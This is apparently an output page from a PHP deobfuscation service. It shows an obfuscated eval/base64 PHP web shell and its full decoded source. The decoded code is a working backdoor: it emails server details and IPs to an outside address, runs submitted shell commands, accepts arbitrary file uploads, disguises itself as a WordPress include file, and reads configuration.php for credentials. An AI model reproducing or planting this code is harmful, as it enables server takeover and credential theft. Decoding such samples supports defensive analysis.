Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(gzinflate(str_rot13(base64_decode('rUl6QuNTEP5cJP7Dso1heh043EhIQoARlDi9VSWhZOgX..
Decoded Output download
@ini_restore("disable_functions");
if (!isset($_SESSION['bajak'])) {
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "Shell Injector
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$df='ini_get disable!';
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Shell Result http://$web$inj
$security
IP Server = $serper
IP Injector= $injektor");
$_SESSION['bajak'] = 0;
}
else {$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/wp-includes/wp-info.php";
rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>BArNEr</title><br><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
echo "<font size=2 color=#888888><b>Disable Functions : ";$df='ini_get disable!';
if((@function_exists('ini_get')) && (''==($df=@ini_get('disable_functions')))){echo "NONE";}else{echo "$df";}
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." :D "; }
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
}
else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
}
if(isset($_GET['baca'])){
$conf = file_get_contents("../../configuration.php");
echo $conf;
}
Did this file decode correctly?
Original Code
<?php eval(gzinflate(str_rot13(base64_decode('rUl6QuNTEP5cJP7Dso1heh043EhIQoARlDi9VSWhZOgXQJZwYpIFv8m7Jpci/nt0ae28XA7KSBeB4sw887rPzvhZcSIouUdsyS0aCxmOEx5ZqixFIs8ktY9qasSES3tPV66sSeB7vt8b9GLYOLwPH9idev/0tLvTbRRFqCivMlJcZQhTrTkfwyMaDP/2hjf083VnFXwe+CNth3eR3WKoh95f154/Cq6HPQMY5/ECENSf8SQhveyeVJAkuc3QM5pGUcljwtPDmAPyDFiZT5IMhU6ax5wt018CevLUkjyqV6EW6P286wWXg44HDgbdLj1+3t3hieSvoPoAwtDxxHJoVU/qzu0xnRQvC166oJjlRY0XTJhleEwqM9/BbKczhP7VzeAPS51YXjIabZeDkbdzlIYiseikV5I0nIro42J0RhQ5RJ7SfU9o/+h+3b4hl0iiyFmp4qjdYToIvXmKvM1tSsTn5SPHJOoKYTMC0qb1IGHy1LTY5k999KsWYSHev9e9ExOr4dMf3uiGUlaeZOQSRVbmSBnxaGUw/2/YuxoF3d6fXv/80nCaIDGwSRBqheoMLq4vvf4oGA4GI2nn0Pa8OBBMlEcANc+T3ClzBTKn5KbBJto+Me55k/4PpNXRm3VocXUFoHWWE22ihFf46e/nct8rQtrm18m41P+YfQ2b5GPfpPiHux9WlCdjUz9/0h8AnkV0GcuhJ+3x0rgFwqCCI2mpUh0oLQAB9FB2oXI71H54jHgwgOQrEbvaRrqAVPCwDOFDMl0pp18r19NtRjw8NAhV8RiDVx+h/f1hOua2kmEz59Dl8cs3Gvh3nTVQMeBfhEfSd6DMtsm7asRvzGgt9LFvzNY8BSyQ3KTYH/Q9OGakUi0BcFqCBkGKOfSL4KWI5rEZDhGKWVetypWqLItcTajfdHqmYpBJ7aEu4ZlJ2QcfQ0RlSJUZTokD4IaUQnhlfT14+bdP3N5+QgxAvxykDoSVMziuMiUpzj4gyxVhCRLqHriUnr5+mBdsmoZM3GPgUXFSpYhNFNylin9ElCBaXBqlMd3U+tU4FSu98VDJcJhH+vcD4NuY2Sk73syUwwF2FymMSESEpdK4gzhHbpNsRg5J8x8lXBdWHsakKxKuy3UjbauamYhwntXZV5P7BmAC9rUarxf+pGjMQsbbq0z0+VxbH5H1JNb8cDeN9Ydf6zgZn+MDJUQSV+mqY8PAJEzr6Este3gK3nXv2kHAjt0wcNx5hVdbxALXRrG6A3stnVRwRqcDU0JNobcIrg3/hjUtbmqA0yDNwzR/5IHxzuMAAdY3WkdNBMYMlsUyG1SHqZP5Ia6wTTMOGknASecxjrZ0b2kI2dD7SBRkKYkCkfO1O5i/VB2YeuRM37atJtekYroMalG3rEmmsV619VUtV77OoF8aBh3qD+wbie8aMB5scaEnPZgNidp1WNffDcj/Y8oSVg6SkL3ga/u9bxxT4bK0PJtAemsGgd5sYA87QsIKZ9rwh20xrcoQ765+WLCb0rUtxvgX')))); ?>
Function Calls
gzinflate | 1 |
str_rot13 | 1 |
base64_decode | 1 |
Stats
MD5 | d2d055ae0e556ee291f5d3c9814dfc68 |
Eval Count | 1 |
Decode Time | 92 ms |